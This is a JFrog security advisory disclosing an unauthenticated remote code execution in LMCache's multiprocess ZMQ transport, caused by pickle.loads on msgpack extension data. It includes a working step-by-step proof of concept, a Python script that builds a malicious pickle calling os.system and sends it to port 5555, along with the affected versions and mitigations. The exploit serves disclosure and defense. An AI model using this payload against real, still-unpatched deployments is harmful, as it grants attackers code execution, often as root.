< Back

JFSA-2026-001694382 - LMCache is vulnerable to Unauthenticated Remote Code Execution via Pickle Deserialization on the Multiprocess ZMQ Transport

CVE-2026-105192 | CVSS 9.8

JFrog Severity:critical

Discovered ByYuval Moravchickof the JFrog Security Research Team

Published 7 Oct, 2026 | Last updated 7 Oct, 2026

LMCache is vulnerable to Unauthenticated Remote Code Execution via Pickle Deserialization on the Multiprocess ZMQ Transport

lmcache (github.com/LMCache/LMCache)

= 0.3.9

LMCache multiprocess mode, also called distributed mode, opens an unauthenticated ZeroMQ ROUTER so worker processes can register and share KV cache blocks. The intended clients are sibling LMCache processes. There is no CURVE, ZAP, password, or message authentication on that socket. LMCache used only inside a vLLM process does not open this port. The transport binds to localhost unless the operator sets a routable address with --host, which is how multi-node deployments let peers connect. The 9.8 score is for that routable configuration. A stock single-host install that leaves the default bind is not reachable from other machines.

Messages on the socket are msgpack. Extension code 1 is registered for DeviceIPCWrapper and is passed to DeviceIPCWrapper.Deserialize in lmcache/v1/platform/base/ipc_wrapper.py, which calls pickle.loads. That hook runs from ext_hook in lmcache/v1/multiprocess/custom_types.py while the server is still decoding REGISTER_KV_CACHE arguments, before the handler runs. A single unauthenticated ZMQ DEALER message to the transport port (default 5555) therefore executes code as the user the LMCache process runs as. Official container images run that process as root.

The decode path shipped in v0.3.9. It is still present in the latest PyPI release, v0.5.5, in the v0.5.6 release candidates through v0.5.6rc3, and on the dev branch as of 2026-10-07. No fixed version has been published.


Step 1 - Start multiprocess mode bound to a routable address


This is the documented multi-node setting. The ZMQ transport listens on port 5555.

python -m lmcache.v1.multiprocess.http_server \
    --http-host 127.0.0.1 --http-port 8080 \
    --host 0.0.0.0 --port 5555 \
    --l1-size-gb 0.25 --eviction-policy LRU \
    --hash-algorithm blake3 --instance-id mp-node-01

Step 2 - Build a REGISTER_KV_CACHE frame whose cache slot is a pickle


Payload slot 1 is a msgpack extension with code 1. The server unpickles that body while it is still decoding arguments. The command writes id to /tmp/zmq_pwn.

import os
import pickle
import msgspec
import zmq

class EvilPayload:
    def __init__(self, cmd):
        self.cmd = cmd
    def __reduce__(self):
        return (os.system, (self.cmd,))

evil_pickle = pickle.dumps(EvilPayload("id > /tmp/zmq_pwn 2>&1"))

REGISTER_KV_CACHE = 1
EXT_CODE = 1
NUM_PAYLOADS = 7
KVCACHE_INDEX = 1

b_uid = msgspec.msgpack.encode(0)
b_type = msgspec.msgpack.encode(REGISTER_KV_CACHE)
payloads = [msgspec.msgpack.encode(None)] * NUM_PAYLOADS
payloads[0] = msgspec.msgpack.encode(0)
payloads[KVCACHE_INDEX] = msgspec.msgpack.encode(
    [msgspec.msgpack.Ext(EXT_CODE, evil_pickle)]
)
frames = [b_uid, b_type, *payloads]

Step 3 - Send the frame


ctx = zmq.Context()
s = ctx.socket(zmq.DEALER)
s.connect("tcp://127.0.0.1:5555")
s.send_multipart(frames)

The pickle runs during argument decode. The server then logs a type error for REGISTER_KV_CACHE because the handler expected a DeviceIPCWrapper and received the return value of os.system. That error is after the command has already run.


Step 4 - Confirm the command ran as the LMCache user


cat /tmp/zmq_pwn

Expected output on an official image, where the process runs as root:

uid=0(root) gid=0(root) groups=0(root)

No fixed release is available as of 2026-10-07. The latest PyPI release is v0.5.5, and v0.5.6rc3 and the dev branch still call pickle.loads from DeviceIPCWrapper.Deserialize.

Stop passing network bytes to pickle. Replace the serializer behind msgpack extension code 1 with a safe format, and do not call pickle.loads on data that arrived from an unauthenticated peer. Authenticate the ZMQ transport, for example with CURVE or an HMAC over each message, and refuse to bind a routable address unless that authentication is configured.

Until a release includes that change, do not set --host to a routable address. Keep the multiprocess port on localhost or on a trusted cluster network. Limiting the port with a firewall reduces who can reach it. Any host that can open a connection to the port can still run code as the LMCache user.

https://www.cve.org/CVERecord?id=CVE-2026-105192 https://github.com/LMCache/LMCache https://pypi.org/project/lmcache/ https://github.com/LMCache/LMCache/blob/v0.5.5/lmcache/v1/platform/base/ipc_wrapper.py https://github.com/LMCache/LMCache/blob/v0.3.9/lmcache/v1/multiprocess/custom_types.py

< Back